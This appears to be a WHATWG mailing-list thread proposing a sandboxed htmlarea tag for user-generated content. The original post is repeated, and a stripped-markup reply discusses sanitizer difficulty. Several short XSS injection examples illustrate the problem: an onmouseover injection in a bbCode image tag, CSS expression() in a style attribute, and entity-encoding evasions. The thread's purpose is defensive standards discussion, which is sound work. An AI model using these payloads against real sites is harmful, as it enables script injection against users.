default, and then only allows known elements and attributes; and in the case of the style attribute, known properties and values that are safe, then that would also be the case. I have written a sanitizer for html and it is very difficult - especially since browsers have undocumented bugs in their parsing. Example: div colspan=amp; style=font-family#61;expression#40;alert#40quot;hackedquot#41#41 colspan=amp;Red/div The proof that sanitazing HTML is difficult is the fact that no major site even attempts it. Even wikipedia use some obscure wiki-language, instead of implementing a wysiwyg editor. [snip] 2: The use of src= yields problems with iframe heights (since the src-url must be hosted on another server javascript cannot fix this) and HTML 4 browsers have no other method of adjusting the iframe height according to the content. In recent browsers that support cross-document messaging (Opera 9, Safari 3, Firefox 3 and IE 8), you could include a script within the comment page that calculates its own height and sends a message to the parent page with the info. In older browsers, just set the height to a reasonable minimum and let the user scroll. Sure, it's not perfect, but it's called graceul degradation. Much more difficult to implement than a sandbox/sandbox mechanism - and I do not see the point giving more work to web developers when it could be fixed so easily. 3: If you have a page that lists 60 comments on a blog, then the user agent would have to contact the server 60 times to fetch each comment. This again means that perl/php scripts have to be invoked 60 times for one page view - that is 61 separate database connections and session initializations. You could always concatenate all of the comments into a single file, reducing it down to 1 request. No you could not, if you for example want people to report comments or give them votes - which in the Web 2.0 world requires scripting. [snip] If HTML 5 browsers require everything between htmlarea/htmlarea to be html entity escaped, that is and must be replaced with lt; and gt; respectively. If this is not done, HTML 5 browsers will issue a severe warning and refuse to display the page. Developers will quickly learn. Draconian error handling is something we really want to avoid, particularly when the such an error can be triggered by failing to handle user generated content properly. I see that argument. Maybe you have a suggestion to what should happen if unescaped HTML is encountered then? HTML 4 browsers will never run scripts (since it will only see plain text). HTML 5 browsers will display rich text. It would be completely secure for both HTML 4 and HTML 5 browsers. A simple Javascript could clean up the HTML markup for HTML 4 browsers.. In a separate mail, you wrote: data lt;user supplied inputgt; /data Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4 browsers will display html, while HTML 5 browsers will display correctly formatted code. A simple
[whatwg] Sandboxing to accommodate user generated content.
Hi! I am a new member of this mailing list, and I wish to contribute with a couple of specific requirements that I believe should be discussed and perhaps implemented in the final specification. I am unsure if this is the correct place to post my ideas (or if my ideas are even new), but if it is not, then I am sure somebody will instruct me. :) One person told me that the specification was finished and no new features would be added from now on - but hopefully that is not true. The challenge: More and more websites have features where users can contribute with user generated content - often in the form of audio, video, images or wiki-articles. An older type of content contribution is normal text such as posts in a discussion forum, a mailing list such as this and comments on blog articles. A major challenge for many web developers is validating untrusted content such as the message body of a blog comment. Unless the developer has a flawless and future proof algorithm for ensuring that the message body does not contain any script, web developers have to resort to text only - or bbCode-style markup languages to allow users to post text content with richer formatting. If the developer wants to enable rich formatting using bbCode, it also needs fairly advanced methods of ensuring that no scripts are executed. Consider this bbCode example: [img]some_image.jpg'onmouseover=maliciousScript()[/img]. The bbCode parser must ensure that there is absolutely no method of injecting scripts in user posts - and that is very difficult when at the same time there exists parsing errors in browsers. The example could easily be validating by not allowing apostrophes or quotation marks in urls - but then we have multiple entities that could be used: apos; or #39;. To make matters worse, some browsers parse #39 which is an incomplete html entity and all these variations must be considered by the bbCode parser author. Another problem which makes future proofing this type of security is that standards evolve. A few years ago you could safely allow users to apply css-styles to tags. Example bbCode tag [color=blue]Blue text[/color] would be translated to span style='color: blue'Blue text/span. In this example an exploit could be [color=expression(maliciousCode())]Text[/color]. When the algorithm was made, it was considered secure, since no script could ever be executed inside a style attribute. With the invention of expressions and behaviours etc the knowledge required by web developers are ever increasing, and web developers have to review all old code whenever new technologies emerge - because what once was secure suddenly is not secure anymore. One solution: htmlareaUser generated content/htmlarea No scripts would ever be allowed to be executed inside this tag. Malicious users could potentially submit /htmlarea unsafe content htmlarea and get around this. There are as I can see it two solutions to this: User generated content inside the tag must be escaped using html entities (but still rendered as html by the user agent), or the author must prevent users from submitting the string /htmlarea and all possible variations of the tag. If the first solution is used, then browsers should display a strong security warning if unescaped content is seen between htmlarea-tags on a website (to educated web developers). A sidenote: The tag name I chose is based on the textarea-tags which should also be entity escaped to prevent users from inserting the text /textarea. This currently breaks a lot of web pages - so perhaps a strong security warning is in place if unescaped content is found after the textarea start tag also? -- Best regards / Med vennlig hilsen Frode Børli Seria.no Mobile: +47 406 16 637 Company: +47 216 90 000 Fax: +47 216 91 000 Think about the environment. Do not print this e-mail unless you really need to. Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.
[whatwg] Sandboxing to accommodate user generated content.
Hi! I am a new member of this mailing list, and I wish to contribute with a couple of specific requirements that I believe should be discussed and perhaps implemented in the final specification. I am unsure if this is the correct place to post my ideas (or if my ideas are even new), but if it is not, then I am sure somebody will instruct me. :) One person told me that the specification was finished and no new features would be added from now on - but hopefully that is not true. The challenge: More and more websites have features where users can contribute with user generated content - often in the form of audio, video, images or wiki-articles. An older type of content contribution is normal text such as posts in a discussion forum, a mailing list such as this and comments on blog articles. A major challenge for many web developers is validating untrusted content such as the message body of a blog comment. Unless the developer has a flawless and future proof algorithm for ensuring that the message body does not contain any script, web developers have to resort to text only - or bbCode-style markup languages to allow users to post text content with richer formatting. If the developer wants to enable rich formatting using bbCode, it also needs fairly advanced methods of ensuring that no scripts are executed. Consider this bbCode example: [img]some_image.jpg'onmouseover=maliciousScript()[/img]. The bbCode parser must ensure that there is absolutely no method of injecting scripts in user posts - and that is very difficult when at the same time there exists parsing errors in browsers. The example could easily be validating by not allowing apostrophes or quotation marks in urls - but then we have multiple entities that could be used: apos; or #39;. To make matters worse, some browsers parse #39 which is an incomplete html entity and all these variations must be considered by the bbCode parser author. Another problem which makes future proofing this type of security is that standards evolve. A few years ago you could safely allow users to apply css-styles to tags. Example bbCode tag [color=blue]Blue text[/color] would be translated to span style='color: blue'Blue text/span. In this example an exploit could be [color=expression(maliciousCode())]Text[/color]. When the algorithm was made, it was considered secure, since no script could ever be executed inside a style attribute. With the invention of expressions and behaviours etc the knowledge required by web developers are ever increasing, and web developers have to review all old code whenever new technologies emerge - because what once was secure suddenly is not secure anymore. One solution: htmlareaUser generated content/htmlarea No scripts would ever be allowed to be executed inside this tag. Malicious users could potentially submit /htmlarea unsafe content htmlarea and get around this. There are as I can see it two solutions to this: User generated content inside the tag must be escaped using html entities (but still rendered as html by the user agent), or the author must prevent users from submitting the string /htmlarea and all possible variations of the tag. If the first solution is used, then browsers should display a strong security warning if unescaped content is seen between htmlarea-tags on a website (to educated web developers). A sidenote: The tag name I chose is based on the textarea-tags which should also be entity escaped to prevent users from inserting the text /textarea. This currently breaks a lot of web pages - so perhaps a strong security warning is in place if unescaped content is found after the textarea start tag also? -- Best regards / Med vennlig hilsen Frode Børli Seria.no Mobile: +47 406 16 637 Company: +47 216 90 000 Fax: +47 216 91 000 Think about the environment. Do not print this e-mail unless you really need to. Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig. -- Best regards / Med vennlig hilsen Frode Børli Seria.no Mobile: +47 406 16 637 Company: +47 216 90 000 Fax: +47 216 91 000 Think about the environment. Do not print this e-mail unless you really need to. Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.